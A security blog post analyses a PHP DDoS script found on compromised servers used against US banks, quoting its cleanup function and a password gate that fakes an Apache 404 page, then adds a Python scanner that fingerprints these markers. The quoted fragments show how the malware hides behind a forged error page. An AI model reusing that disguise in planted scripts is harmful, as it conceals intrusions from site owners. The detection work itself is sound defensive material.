Just recently the BSI warned about an ongoing attack on US banks.
The PHP script involved showed a “404” error when called without any
arguments.
A closer look shows a “404 Not Foun derror”, WITH the typo in it.
Now we have a neat string to search for on Google or wherever...
and bingo: some other victim already posted the source code
found on their infected web server:
Here we can see that a POST action “stop” makes the DDoS go away:
function stoped()
{
    // remove the dropped files and kill the running ping flood
    @unlink($base."stmdu.php");
    @unlink($base."stp.hp");
    cmdexec("killall ping;");
    print "Stop & Clean";
}
And here is where the typo sits, in the password gate that every unauthenticated request runs into:
if(md5(md5(md5($_REQUEST['pass'])))!=$pass_up and $_SESSION['LoGiN']!=true)
{
    // fake Apache error page, printed by the script itself (note the typo)
    print "404 Not Found
Not Found
The requested URL ".$_SERVER['PHP_SELF']." was not found on this server
Additionally, a 404 Not Foun derror was encountered while trying to use an Error Document to handle the request
";
    die();
    exit();
}
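The two things above that make this script easy to spot, the misspelled error text and the triple-md5 password gate, can be turned into a simple scanner. The following is an added example written for this post, not code from the original page or from the malware: it greps a web root for the markers taken from the posted source and classifies the HTTP reply of a suspect URL. The file layout in the demo (an `images/` directory holding `stmdu.php`), the sample file contents and the "200 status with 404 text" heuristic are my own assumptions; the last one rests on the fact that a PHP script which only `print`s an error page without calling `header()` still answers with status 200.

```python
"""Fingerprint scanner for the fake-404 DDoS script discussed above.

Added example, not part of the original post or of the malware. Markers are
taken from the posted source: the typo in the error text, the
md5(md5(md5(...))) password check and the 'killall ping' cleanup.
"""
import os
import re
import tempfile

# Markers lifted from the posted source. A real Apache error page spells
# "Found error", so the typo alone is a strong indicator.
TYPO_MARKER = "404 Not Foun derror"
TRIPLE_MD5_RE = re.compile(r"md5\s*\(\s*md5\s*\(\s*md5\s*\(", re.I)
STOP_MARKER = "killall ping"


def score_source(text):
    """Return the list of marker names found in a PHP source text."""
    hits = []
    if TYPO_MARKER in text:
        hits.append("typo-404")
    if TRIPLE_MD5_RE.search(text):
        hits.append("triple-md5-gate")
    if STOP_MARKER in text:
        hits.append("killall-ping")
    return hits


def scan_tree(root, exts=(".php", ".phtml", ".inc")):
    """Walk a web root and return {path: [markers]} for every file with a hit."""
    findings = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hits = score_source(fh.read())
            except OSError:
                continue
            if hits:
                findings[path] = hits
    return findings


def classify_response(status, body):
    """Classify the reply to a bare GET of a suspect script.

    'typo-404' : the misspelled marker is present, whatever the status
    'fake-404' : body claims 404 but status is 200 (PHP print() without header())
    'ok'       : nothing notable
    """
    if TYPO_MARKER in body:
        return "typo-404"
    if status == 200 and re.search(r"\b404 Not Found\b", body):
        return "fake-404"
    return "ok"


# Constructed sample files (assumption: not real malware, just the markers).
SAMPLE_MALICIOUS = '''<?php
if(md5(md5(md5($_REQUEST['pass'])))!=$pass_up and $_SESSION['LoGiN']!=true)
{ print "404 Not Found ... Additionally, a 404 Not Foun derror was encountered"; die(); }
function stoped(){ cmdexec("killall ping;"); }
'''
SAMPLE_BENIGN = '''<?php
if (!password_verify($_POST["pass"] ?? "", $hash)) { http_response_code(403); exit; }
echo "hello";
'''


def demo():
    """Build a throwaway web root with one infected file and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "images"))
        with open(os.path.join(root, "images", "stmdu.php"), "w") as fh:
            fh.write(SAMPLE_MALICIOUS)
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write(SAMPLE_BENIGN)
        findings = scan_tree(root)
        # normalise separators so the result reads the same on every OS
        return {os.path.relpath(p, root).replace(os.sep, "/"): h
                for p, h in findings.items()}


if __name__ == "__main__":
    for path, hits in demo().items():
        print(path, hits)
```

Run it against a real document root by calling `scan_tree("/var/www")`; for a live check, feed the status code and body of a GET to the suspect URL into `classify_response`. A hit on `typo-404` is conclusive for this particular script, while `fake-404` only says that some script is forging an error page and deserves a look.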